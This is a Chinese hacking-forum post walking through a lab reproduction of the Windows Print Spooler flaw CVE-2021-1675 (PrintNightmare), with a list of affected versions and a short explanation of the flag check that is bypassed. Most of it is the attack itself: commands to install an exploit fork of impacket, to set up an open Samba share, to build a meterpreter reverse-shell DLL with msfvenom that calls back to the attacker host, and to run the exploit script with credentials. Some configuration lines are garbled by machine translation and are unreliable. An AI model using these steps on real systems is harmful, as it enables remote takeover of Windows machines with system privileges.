用户
搜索
  • TA的每日心情
    无聊
    2021-11-20 18:35
  • 签到天数: 82 天

    连续签到: 1 天

    [LV.6]常住居民II

    版主

    bilibili:末心a

    Rank: 7Rank: 7Rank: 7

    105

    主题

    324

    帖子

    3029

    魔法币
    收听
    0
    粉丝
    11
    注册时间
    2018-8-22

    楚春秋达人积极活跃奖限定版春秋段子手推广达人春秋文阁

    M0x1n 版主 bilibili:末心a 楚 春秋达人 积极活跃奖 限定版春秋段子手 推广达人 春秋文阁 楼主
    发表于 2021-11-5 22:06:08 13259
    本帖最后由 M0x1n 于 2021-11-5 22:18 编辑

    0x01 漏洞参考:

    https://github.com/cube0x0/CVE-2021-1675
    https://b23.tv/ECj2lA

    影响版本:

    Windows Server 2012 R2(服务器核心安装)
    Windows Server 2012 R2
    Windows Server 2012(服务器核心安装)
    Windows Server 2012
    Windows Server 2008 R2 for x64-based Systems Service Pack 1(服务器内核安装))
    Windows Server 2008 R2 for x64-based Systems Service Pack 1
    Windows Server 2008 for x64-based Systems Service Pack 2(服务器内核安装)
    Windows Server 2008 for x64-based Systems Service Pack 2
    Windows Server 2008 for 32- bit Systems Service Pack 2(服务器内核安装)
    Windows Server 2008 for 32-bit Systems Service Pack 2
    Windows RT 8.1
    适用于基于x64系统的
    Windows 8.1 > 适用于32位系统的Windows 8.1
    适用于基于x64系统的
    Windows 7 Service Pack 1 > 适用于32位系统的Windows 7 Service Pack 1
    Windows Server 2016(服务器核心安装)
    Windows Server 2016
    Windows 10 Version 1607 for x64-based Systems
    Windows 10 Version 1607 for 32-bit Systems
    Windows 10 for x64-based Systems
    Windows 10 for 32-bit Systems
    Windows Server, version 20H2 (Server Core Installation)
    Windows 10 for based ARM64 的系统
    版本 20H2 > 用于 32 位系统的
    Windows 10 版本 20H2 > 适用于 x64 系统的 Windows 10 版本 20H2
    Windows Server,版本 2004(服务器内核安装)
    Windows 10 Version 2004 for x64-based Systems
    Windows 10 Version 2004 for ARM64-
    bit Systems
    Windows 10 Version 2004 for 32-bit Systems > Windows 10 Version 21H1 for 32-bit Systems
    Windows 10 Version 21H1 for ARM64-based systems
    Windows 10 Version 21H1 for x64-based systems
    Windows 10 Version 1909 for ARM64-based systems
    适用于 x64
    位系统的
    Windows 10 Version 1909 > 适用于 32位系统的Windows 10 Version 1909 > Windows Server 2019(服务器核心安装)
    Windows Server 2019
    适用于基于 ARM64 的系统的
    Windows 10 Version 1809 > 适用于 x64 的 Windows 10 Version 1809 -based Systems
    Windows 10 Version 1809 for 32-bit Systems

    0x02 漏洞原理:

    该漏洞发生在 AddPrinterDriverEx 函数,它共有三个参数,其中第三个参数是标志,该标志有一个特殊的值在官方文档中出现:APD_INSTALL_WARNED_DRIVER = 0x00008000。根据图 1 中的代码逻辑,在调用InternalAddPrinterDriverEx之前,会通过bittest对标志的0xf位进行验证。如果是1的话,则V12的值仍然为0,可以绕过第24行中对访问的检查,成功调用InternalAddPrinterDriverEx。

    微软在6月8日修复了该漏洞,具体是在AddPrinterDriverEx中加入了权限的权限,重点在于YIsElevated、YIsElevationRequered和RunningAsLUA三个函数,当v12==0、v13==1v9==1 ,flag中的0x8000会&被删除,直到当天调用到SplAddPrinterDriverEx时权限失败,阻止了漏洞发生。

    该漏洞点在于,调用YAddPrinterDriverEx函数,没有对参数dwFileCopyFlags做验证,使用APD_INSTALL_WARNED_DRIVER 标志,导致通过对合法性开启,可以任意的加载DLL,并且系统权限。

    0x03现复:

    复现环境:

    我们需要一个linux
    受害机:window2019(192.168.3.103)
    服务机:Debian11( 192.168.3.104),配置可无密码访问的共享文件夹。
    攻击机:kali(192.168.3.102)
    (环境全在虚拟机中)
    下载捕捉漏洞POC,并且执行GitHub指导指定依赖。

    安装他的
    impacket pip3 uninstall impacket
    git clone https://github.com/cube0x0/impacket
    cd impacket
    python3 ./setup.py install

    将Poc复制到Kali上
    另一台机器配置一下samba(Debian11)

    su
    apt install samba
    apt install samba-client
    gedit /etc/samba /smb.conf
    修改smb.conf的内容如下
    [global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guest = yes
    idmap config * : backend = tdb
    smb ports = 445

    [smb]
    评论 = 桑巴
    路径 = /tmp/
    guest ok = yes
    read only = no
    browsable = yes
    create mask = 0777
    directory mask = 0775
    guest ok = yes

    打开Kali,生成木马并配置网络
    msfVENOM -p windows/x64/meterpreter/reverse_tcp LHOST=192.168. 3.102 LPORT=9999 -f dll -o y.dll
    进入msfconsole

    Msfconsole
    handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.3.102 -P 9999


    然后,上传恶意DLL文件到共享文件夹中(如果是Windows我们也可以通过手动的方式)
    scp y.dll root@192.168.3.104:/tmp/
    (上述操作需要开启SSH)

    上传y.dll到tmp目录
    启动WindowsServer2019

    防火墙
    防火墙Spooler服务

    启动攻击脚本:

    python3 CVE-2021-1675.py Users/M:Moxin123..@192.168.3.103 “\\192.168.3.104\smb\y.dll”
    如果没有启动Spooler,回显是这样的:

    如果连接用户失败,回显和上面相同。

    不过影响不了我们

    成功连接Msfconsole
    后续我们会话-i 1
    就可以使用Meterpreter

    0x04

    总结了这个自己漏洞的内网复现就成功了,Payload在2019上是很好用的。

    微信公众号:末心网安 | Q群374327762 | 淘宝店铺:末心网络|TinSec(听安)
    赞啊,大佬大佬大佬大佬大佬大佬大佬大佬
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册